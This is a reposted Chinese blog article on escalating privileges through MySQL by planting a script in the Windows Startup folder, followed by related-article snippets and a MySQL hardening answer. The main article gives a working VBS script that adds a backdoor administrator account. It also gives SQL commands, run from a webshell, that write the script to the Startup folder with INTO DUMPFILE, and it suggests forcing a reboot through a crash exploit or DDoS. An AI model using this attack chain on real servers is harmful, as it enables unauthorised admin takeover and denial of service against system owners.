MySQL启动项提权

最新推荐文章于 2024-10-12 11:18:57 发布
最新推荐文章于 2024-10-12 11:18:57 发布
阅读量113 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 shell
原文链接:http://www.cnblogs.com/wh4am1/p/6613759.html

关于MySQL的启动项提权,听其名知其意。就是将一段 VBS脚本导入到  C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令!

这里有两种思路:

1. 如果  C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在可读写的权限,那么我们可以直接将 VBS 提权脚本上传到该目录下!

VBS 提权脚本代码如下:

setwsnetwork=CreateObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os)
Setoe=GetObject(os&”/Administrators,group”)
Set od=ob.Create(“user”,”secist”)
od.SetPassword “secist.com”
od.SetInfo
Set of=GetObject(os&“/secist”,user)
oe.add os&“/secist”

将以上代码保存为 .vbs 后缀的文件上传即可!

2. 通过大马的MySQL执行功能,利用SQL命令来进行VBS脚本的创建及添加。

create table secist(cmd text);

insert into secist values(“set wshshell=createobject(“”wscript.shell””)”);

insert into secist values(“a=wshshell.run(“”cmd.exe /c net user secist secist.com /add“”,0)”);

insert into secist values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators secist /add“”,0)”);

select * from secist into dumpfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\secist.vbs”;

成功执行以上命令后,只要管理员重启了服务器,我们就可以成功提权了!

温馨提示:

1.关于重启目标服务器,我们可以利用一些可导致服务器蓝屏的EXP,或者DDoS拒绝服务!

2.上传的目录必须具备可读写的权限!

3.调用的 cmd 也必须有足够的权限!

转载于:https://www.cnblogs.com/wh4am1/p/6613759.html

Mysql数据库—开机启动项
cxrpty的博客
03-11 514
实验环境:windows2008、物理机 实验原理:利用Mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql限就很高,至少是管理员限,甚至是system),该实验只能在windows中使用 实验步骤: 一、利用中国菜刀连接win2008,并连接数据库 二、在数据库命令行写入命令: select "net user cxr...
mysql--udf、mof、启动项
yang1234567898的博客
01-05 1275
1、udf 当获取到mysql的root限,需要进行升,可以尝试使用udf 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
Mysql 开机启动项
Fly_鹏程万里
06-07 615
原理 利用Mysql,将后门文件写入开机自启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql限就很高,至少是管理员限,甚至是system),该实验只能在windows中使用。 方式 第一种:如果" C:\Documents and Settings\All Users\「开始」菜单\程序\启动 "目录存在可读写的限,那么我们可以直接将VBS脚本上传到该目录下! ...
Day4——学习之MySQL数据库启动项
0nc3的博客
12-17 267
0x00 原理 重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及命令。 0x01 利用条件 两种情况下均可用启动项 1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写 直接将 VBS 脚本上传到该目录下 2、以...
mysql启动项,mysql启动项写入 -电脑资料
weixin_31021619的博客
03-23 150
if (get_magic_quotes_gpc()){function stripslashes_deep($value){$value = is_array($value)?array_map('stripslashes_deep',$value):stripslashes($value);return $value;}$_POST = array_map('stripslashes_...
渗透测试之 (udf+mof+启动项
LKmnbZ's Blog
11-07 5892
1. 限给高限去取(你已经获得一定的限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 限以创建和抛弃函...
小迪安全学习笔记(升--MySQL数据库)(二)
weixin_63560942的博客
03-24 1371
首先获取MySQL数据库用户密码,可以用本地连接暴力猜解,或者读取敏感文件获取,最后使用工具输入IP和账号密码端口进行连接,MySQL数据库方式有UDF,MOF,写入.dll(动态连接库)文件,也可以执行反弹shell文件进行MSF连接,还有写入启动任务再用DDos攻击强制服务器重启。
mysql漏洞利用与
willow_liang的博客
04-22 2876
目录 一 、Mysql信息收集 1.使用Nmap进行mysql的信息收集 2.通过msf探测mysql信息 3.使用sqlmap进行sql注入收集mysql版本信息 二、获取mysql密码 1.使用msf模块爆破 2.nmap脚本进行爆破 3.sqlmap的sql-shell查询哈希值 4.从网站泄露的源代码中查找配置文件获取用户名密码 三、通过Mysql向服务器写shell 1.利用联合注入写入shell 2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell 3.当
mysql数据库
m0_63197559的博客
04-10 1564
MySQL数据库学习总结
mysql数据库程序 启动项_Day4——学习之MySQL数据库启动项
weixin_39801356的博客
01-19 137
0x00 原理重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及命令。0x01 利用条件两种情况下均可用启动项1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写直接将 VBS 脚本上传到该目录下2、以root账号...
升:Mysql 数据库 .(UDF || 启动项 || 反弹)
网络安全领域___专研者.
04-29 1637
升简称,由于操作系统都是多用户操作系统,用户之间都有限控制,比如通过 Web 漏洞拿到的是 Web 进程的限,往往 Web 服务都是以一个限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其升为管理甚至是 System 限。通常通过操作系统漏洞或操作系统的错误配置进行,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行
启动项
yumengzth的博客
07-23 1896
0x00开机启动项 windows开机时候都会有一些开机启动的程序,那时候启动的程序限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到的目的。 0x01 关于自动化脚本 自动化脚本可以是bat文件,vbs文件等。 我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器限,查看服务器上系统盘的可读可写目录,若是启动目录 “...
内网渗透之——mysql数据库之——开机启动项
wsnbbz的博客
03-11 860
:只能在windows使用 原理 利用mysql,将后门写入开机自启动项,因为是开机自启动,在写入之后,需要重启目标服务器才能生效(要求mysql限要很高,至少是管理员限甚至需要system限) 开机启动程序上传路径 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startu...
MySQL
weixin_45626840的博客
10-12 196
渗透过程中,拿下一台低限的主机shell(尤其是windows)时,有些操作无法进行,而此时本地恰好存在mysql数据库,且mysql是root限 (windows中mysql一般都是管理员限),就可以通过新建管理员用户等操作实现即udf,也可以称为通过mysql获得管理员限。MySQL启动项,原理就是通过mysql把一段bat或vbs脚本导入到系统的启动项文件夹中,如果管理员启动或者重启的服务器,那么该脚本就会被调用,并执行脚本里面的命令(创建管理员账户),实现升。
MYSQL
weixin_46626159的博客
03-19 5309
MYSQL udf 一.获取网站限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF 1.UDF知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
-MySQL数据库
acepanhuan的博客
02-28 2339
-MySQL数据库
数据库Mysql
白帽黑客鹏哥的博客
05-29 1870
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
Windows:利用MySQL数据库
qq_61553520的博客
05-29 1231
udf = 'user defined function',即‘用户自定义函数是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。
mysql启动项进行加固的命令是?
最新发布
03-12
<think>好的,用户想知道如何通过命令行加固MySQL的启动配置。我需要根据供的引用内容来整理相关步骤。首先,用户到的引用[1]里到了降运行MySQL,使用普通用户mysql来运行服务。这可以通过修改my.cnf文件,添加user = mysql配置,然后重启服务。接下来,引用[2]和[4]都到了数据目录和安装目录的限控制,需要设置目录限为700,所属用户和组为mysql。然后,引用[3]到了pid文件的配置,确保其限属于mysql用户。此外,可能还需要检查basedir的限,确保只有DBA和数据库用户可访问。可能需要把这些步骤按顺序整理出来,确保每个步骤的命令正确,并且引用对应的来源。用户可能需要具体的命令示例,比如chmod和chown的使用,以及修改配置文件的具体位置。还要注意是否需要重启服务使配置生效。需要确保回答结构清晰,分步骤说明,并且每个步骤后面标注引用来源。</think>### 如何通过命令行加固 MySQL 启动配置? 以下是加固MySQL启动配置的具体步骤,分为**用户限控制**、**目录限管理**和**进程文件加固**三部分: --- #### 1. **以普通用户身份运行MySQL** 默认情况下,MySQL可能以root用户运行,存在安全风险。需修改配置,使其以专用用户(如`mysql`)运行: ```bash # 编辑MySQL配置文件 [root@localhost ~]# vim /usr/local/mysql/my.cnf # 添加或修改以下内容 user = mysql # 指定运行用户为mysql # 重启MySQL服务使配置生效 [root@localhost ~]# /etc/init.d/mysqld restart ``` 此操作将MySQL进程限从root降级为普通用户,减少漏洞的影响范围[^1]。 --- #### 2. **控制数据目录和安装目录限** MySQL的`datadir`(数据目录)和`basedir`(安装目录)需严格限制访问限: ```bash # 查看数据目录位置 mysql> show variables like 'datadir'; # 在终端加固数据目录限 [root@localhost ~]# chmod 700 <datadir> # 仅允许mysql用户读写 [root@localhost ~]# chown -R mysql:mysql <datadir> # 递归修改所属用户和组 # 同理加固安装目录 [root@localhost ~]# chmod 700 /usr/local/mysql/ [root@localhost ~]# chown -R mysql:mysql /usr/local/mysql/ ``` 通过限制目录限,防止未授用户访问或篡改数据库文件[^2][^4]。 --- #### 3. **加固PID文件限** MySQL的进程ID文件(`pid_file`)需确保所有限正确: ```bash # 检查pid文件路径(通常在my.cnf中配置) mysql> show variables like 'pid_file'; # 修改pid文件限 [root@localhost ~]# chown mysql:mysql /var/run/mysqld/mysqld.pid [root@localhost ~]# chmod 644 /var/run/mysqld/mysqld.pid # 若pid文件不存在,可通过重启服务生成 [root@localhost ~]# systemctl restart mysqld ``` 确保PID文件不被恶意用户篡改,避免服务启动异常[^3]。 --- ### 总结 通过上述步骤,MySQL启动配置的安全性将显著升: 1. 以低限用户运行服务 2. 限制关键目录的访问限 3. 控制进程文件的归属和限 完成后,建议使用`ps -ef | grep mysqld`验证进程运行用户,并通过`ls -l <datadir>`检查目录限是否合规。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值